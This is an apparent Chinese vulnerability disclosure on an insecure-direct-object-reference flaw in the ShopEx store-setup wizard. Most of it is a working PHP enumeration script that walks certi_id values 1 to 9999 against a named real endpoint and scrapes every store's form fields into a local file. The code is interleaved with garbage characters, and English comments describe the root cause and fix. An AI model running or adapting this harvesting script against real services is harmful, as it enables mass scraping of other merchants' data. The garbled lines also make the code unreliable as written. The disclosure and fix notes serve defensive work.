|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

certi_id 只是客户端可改的 refer 参数中的一个字段,服务端并未校验它是否属于当前请求者,因此可以被任意替换。

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
, R* r7 ~# f6 e" n<?php: t# y# ]1 D. w6 m* u
6 p5 r. ?0 {& o4 M% a
// Driver loop: walks certi_id 1..9999 in order and calls ShowshopExD for each.
// There is no error handling, delay or early exit, so from the server side the
// pattern is a single client sweeping sequential ids against one endpoint --
// exactly the access pattern an IDOR rate-limit / anomaly rule should catch.
for ($i=1; $i < 10000; $i++) { //enumerate
% W$ ~' h3 x8 x) \: |
$ @0 W$ C: S" M' d8 ~: |, U ShowshopExD($i);
, ~& e! W# ~% A x$ P! v L+ U6 @4 P
}
* E4 Q5 S4 f* L! J: V: V3 `8 e* b3 l. m) Y$ ^9 K# V( m
// Fetches the ShopEx store-setup wizard step-2 page for one certi_id and, if
// the response echoes the request's `refer` blob back, appends every
// <input type="text"> name/value pair found in the page to c:/shopEx.txt.
//
// $cid - value placed in the "certi_id" field of the base64-encoded JSON
//        `refer` query parameter (cast with intval()).
// Returns nothing. Side effects: prints to stdout, appends to c:/shopEx.txt.
//
// Root cause, from the defender's side: the server selects which store's data
// to render purely from a client-built, unsigned `refer` value. The fix is to
// derive certi_id from the authenticated session (or a server-signed token)
// and reject any `refer` whose certi_id the requester is not entitled to.
function ShowshopExD($cid) {7 Z9 E0 ~8 {9 ^2 r8 _/ q) l
* L" k- i3 Q- N
$url='http://guide.ecos.shopex.cn/step2.php';& b3 b; H: ~% q/ e/ S
- b4 m; _% `. ^# z# {+ s
// The JSON is assembled by string concatenation; only certi_id varies, the
// callback_url is a fixed dummy. base64 here is encoding, not protection.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');5 [8 `! Z% u4 x( W4 d
1 ] q7 Q w3 I2 B8 r* M
$url = $url.'?refer='.$refer;8 f) S# |) Q# C9 H/ ~
# y" g; W" ]6 k: `9 \2 W8 L
$ch = curl_init($url);) H3 ^; y% q& ~
) d" G! C# K9 m, W0 d. G
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
O" t, r) s+ z' ~# R3 B! ?1 ]
4 u: ]* v1 w% [- F curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 _; W3 Z" y' @/ I. t
// NOTE: curl_exec() returns false on transport failure; that case is not
// checked and false is passed straight into mb_convert_encoding() below.
7 `7 u- x0 b& U1 A& B $result = curl_exec($ch);! I, F u) H: W8 f& h" v) p
1 } {* s! L! V: W6 s" C4 H
// Whole response is transcoded UTF-8 -> GB2312 before any matching is done.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
5 B* r; U& O y; U0 E3 l! s' A0 ^' @5 H! q2 u7 e( L: ~. Q. V3 Y
// Gate: only proceed when the page reflects the refer blob back. strpos()
// returns 0 (falsy) for a match at offset 0, so this test is `!== false`
// in intent; as written a match at the very start of the body is skipped.
if(strpos($result,$refer))
0 L" H6 q9 |) B/ ?5 V1 p9 X4 g6 H# Q
* }8 U! }& E% i& h# m& L, v {4 x% G* t& @5 M4 `0 Y
// Output file is opened in append-binary mode; fopen() failure is unchecked.
* W$ ^! h. E0 v" R: j, P' q $fp = fopen("c:/shopEx.txt",'ab'); //save file
4 U9 A( [ r! i- H7 D) E% w. t+ N& x( j& w$ V1 `
// $value[1] holds the attribute text between type="text" and the closing />
// for each self-closing text input in the page.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
; C$ ?* \( o3 ~3 f2 d$ [& A* q) G" ]' Q1 E/ T' h" u/ o
// ($key is actually the attribute string of one input, not a hash key.)
foreach ($value[1] as $key) {
& S+ B. U4 p: a4 ^* v% Z1 R6 g6 @$ d( l' u: d9 x9 d8 x% O3 y
// $res[1] = name attribute, $res[3] = value attribute; only the first
// match of each is used. An input without a value attribute yields an
// undefined-offset notice rather than being skipped.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
. B. p$ g+ s" p" C3 K( l4 O& I
2 U+ e( d0 h/ F+ A# `; o echo $res[1][0].':'.$res[3][0]."\r\n";$ ?& v Z% ^6 T9 r$ z% G# `
" e4 s) s# ^$ [1 K' u $col =$res[1][0].':'.$res[3][0]."\r\n";
' @& U& T8 _: B4 l$ x$ H& L8 q; ^5 X+ S, i Q6 k# O3 o( X
fwrite($fp, $col, strlen($col)); 9 B9 B: C0 E+ d! H& p& A D9 s
# ?" Y5 ?0 f8 ^! k0 m7 q }
/ {2 `; M& M7 ?4 H' S6 s; _+ h" Q( A" v8 ?" U4 N! n. g
echo '--------------------------------'."\r\n";/ x6 m5 K' I+ z) w
" i8 @& m, @4 V) l$ J. H5 e
// Closed only inside the if-branch; no handle is opened on the other path.
fclose($fp);
/ o7 L! B2 U. l& d3 e1 S' G* ^6 }
4 M' T( J7 y4 ]# ^ }/ Y% R3 K5 V+ W' U1 L0 L" B
3 O5 @+ `: K, m" J
flush();
% _0 s# \, ^2 y4 i! |6 o1 C* \4 F) G- C7 N2 Q
curl_close($ch);
* M0 r t8 d* o [ x; O. m9 k+ w* c+ b
}3 |- b- ]* v& B- U/ H$ J
) F5 Z# s! Y6 E L?>9 d' w; x; j* R+ h1 Y
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|